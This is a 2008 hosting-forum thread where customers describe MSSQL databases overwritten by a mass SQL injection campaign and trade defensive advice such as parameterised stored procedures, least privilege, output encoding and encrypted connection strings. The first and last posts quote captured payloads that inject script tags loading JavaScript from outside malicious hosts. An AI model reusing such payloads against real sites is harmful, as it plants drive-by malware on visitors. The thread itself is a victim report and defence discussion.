|
|
MSSQL
Started by danwooller at 05-17-2008 2:59 PM. Topic has 10 replies.
  
|
|
Sort Posts:
|
|
|
|
 05-17-2008, 2:59 PM
|
danwooller
Joined on 05-17-2008
Posts 1
|
|
|
Hello.
Has anyone else had their MSSQL database corrupted with code for a script inserted into tables?
The first I had was "<scri//pt src=http://www.adword71.com/b.js></script>" and it overwrote a lot of data. As fast as I could clear it out with SQL queries, it re-appeared. The made me suspect there wasa virus on the SQL server. Of coursem this was denied. If it isn;t a virus, what else could cause it.
I haven't been able to get a lucent response (as usual) out of these guys, and as the call is nw three days old, I thought I would turn to fellow users. Anyone else on sql387?
Luckily my hosting is up for renewal in a few weeks, so if someone from the hosting co doesn't offer a reasonable explanation, I can go somewhere else.
Dan
|
|
|
|
|
Report
|
|
|
|
|
05-21-2008, 3:30 PM
|
admin
Joined on 08-10-2005
Posts 244
|
|
|
|
This is not by virus. There's a big SQL injection attack everywhere right now. So it's 99% likely to be your code being open for SQL injection attack. You'll have to fix your code. Go to google.com and search for SQL injection attack. You should get more information on that and learn how to fix your code to preven SQL injection attack.
|
|
|
|
|
Report
|
|
|
|
|
05-30-2008, 6:51 AM
|
kyz
Joined on 05-30-2008
Posts 2
|
|
|
|
My database was hacked also, although we have taken measures against sql injection. Server is 385. What's going on?
|
|
|
|
|
Report
|
|
|
|
|
05-30-2008, 11:31 AM
|
admin
Joined on 08-10-2005
Posts 244
|
|
|
|
all of our server have the same setup. If they can crack one, they can crack all. If they can crack all, all of the customers db would be hacked.
So if that's the case, we would see thousands of posting here, not just few. So i would suggest you to go back and recheck all your code for injection or other forms of script attacks. If you want, you guys can give me your website URL as well. I can check to make sure teh security guard is already applied to your server. Note that we encounter some amount of servers that's not compatible with it. So the best thing is, let me check. If your server doesn't have it, we can move your account to one that has it.
|
|
|
|
|
Report
|
|
|
|
|
05-30-2008, 1:57 PM
|
DeveloperBarn
Joined on 05-29-2008
Reston, VA
Posts 24
|
|
|
|
How are you all going about securing your data? There are several things you can do to protect your data.
1. Use stored procedures and pass user input to the stored procedures as parameters. No matter what a user inputs, it will be treated as input and not as part of the SQL query.
2. The user account that your users connect to the database through should have only execute permissions on the stored procedures. They should not have access to perform CRUD (Create, Read, Update, Delete) operations on the actual tables.
3. Only allow your users to enter data that your script expects. For example, if a 5-digit zip code is expected, then only characters 0-9 should be allowed and it should only be 5 characters long. Do this verification on both client-side script as well as server-side script.
4. If coding with ASP or ASP.Net, use Server.HtmlEncode when outputting database data to the markup. This will encode characters like < and > to < and > which prevents cross site scripting (XSS) attacks.
There are several other things you can do, but I hope this will be enough to get you started.
Jason
Founder, DeveloperBarn Forums
http://www.developerbarn.com
No longer a WebHost4Life Customer
|
|
|
|
|
Report
|
|
|
|
|
05-31-2008, 11:10 PM
|
rhanson
Joined on 06-01-2008
Posts 2
|
|
|
|
My database also got hacked. Not totally sure how. It looked like someone ran SQL update statement which could not have been done from my application, since none of them allow adhoc SQL.
I was able to restore a recent backup to get everything working again and temporarily removed any program that updates the database except for my bulletin board. Hopefully that wasn't the source of the problem.
I'm wondering if someone hacked in through FTP to get the passwords from the application. I will be changing the programs that should only read to give them a more restricted userid to hopefully slow the hackers down a bit.
|
|
|
|
|
Report
|
|
|
|
|
06-01-2008, 1:34 AM
|
admin
Joined on 08-10-2005
Posts 244
|
|
|
|
What's your URL? it's most likely sql injection attack.
|
|
|
|
|
Report
|
|
|
|
|
06-01-2008, 5:50 PM
|
rhanson
Joined on 06-01-2008
Posts 2
|
|
|
|
The only URLs that allowed updating of content are not directly accessible from a website. You have to know the URL. These pages are used to update content for the site. The public sites, primarily www.madeleinepeyroux.org have no update capability.
Also those pages that allowed update do not do adhoc SQL. The sql is fully controlled by the programs. If someone got my password (now changed) they could have changed one record at a time. Having looked at the data before restoring a undamaged database, it looked very much like someone did a mass update, adding a javascript to select columns in the database. The columns that would display through the public web pages.
I have since change the password, moved the update pages and put an IP restriction on using the update programs.
In thinking about this whole mess, I'm wondering if someone didn't get hold of my FTP (which is secure) password and was therefore able to find the connection string, username and password to the database by looking at the ASP source code. With this in hand they could have mass updated my database without a sql injection attack.
Anyone have any ideas how to not imbed the connection information in the ASP source and still get access to the database???
|
|
|
|
|
Report
|
|
|
|
|
06-01-2008, 6:48 PM
|
deanman
Joined on 04-11-2007
Posts 187
|
|
|
|
Programmatically Encrypting and Decrypting Configuration Sections:
http://asp.net/learn/data-access/tutorial-73-vb.aspx (VB version)
http://asp.net/learn/data-access/tutorial-73-cs.aspx (C# version)
You can hard-code the connection strings too -- and run an obfuscator over the code --, but the encryp/decrypt thingy mentioned above should do the task under most circumstances.
I <3 WebHost4Life.com
|
|
|
|
|
Report
|
|
|
|
|
07-06-2008, 3:25 AM
|
Chain
Joined on 07-06-2008
Posts 1
|
|
|
|
|
I believe you were a vitim of a genuine SQL injection attack. I agree that the webhost4life security has NOT been breeched.
I was recently commissioned to secure a site hosted on webhost4life that was a victim of this attack. I've included some of the captured information from these sql injection attacks below.
It appears that the javascript in the Querystring below downloads and injects SQL into a simple unprotected SELECT statement which updates the entire database destroying all the database content by adding more javascript to all the database content which then executes when visitors view information from the database via the sites pages which then attempts to download a trojan virus onto the vistors computer from this address http: // www. ucomddv .com . Dont go there unless you have good virus protection.
If anyone has more information please post. See the bad behavior below.
----------------------------------
BAD QueryString : ?category = 342<script src=http://www.update34.com/b.js></script>
---------------------------------------------------------------------
ALL_HTTP = HTTP_ACCEPT:*/*
HTTP_ACCEPT_ENCODING:gzip, x-gzip HTTP_HOST:www.irishgardener.com HTTP_USER_AGENT:Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
HTTP_LLF_CACHE_CONTROL:max-stale=60
HTTP_CLIENT_IP:74.6.7.224
HTTP_X_FORWARDED_FOR:74.6.7.224
HTTP_YAHOOREMOTEIP:74.6.7.224 HTTP_YAHOOREMOTEIPSIG:gaI6c6dtJYcGwIHcejyjCg--~A
|
|
|
|
|
Report
|
|
|
|
|
Webhost4life Fo... » Database Relate... » MSSQL » Virus on SQL Server?
|
|
|
|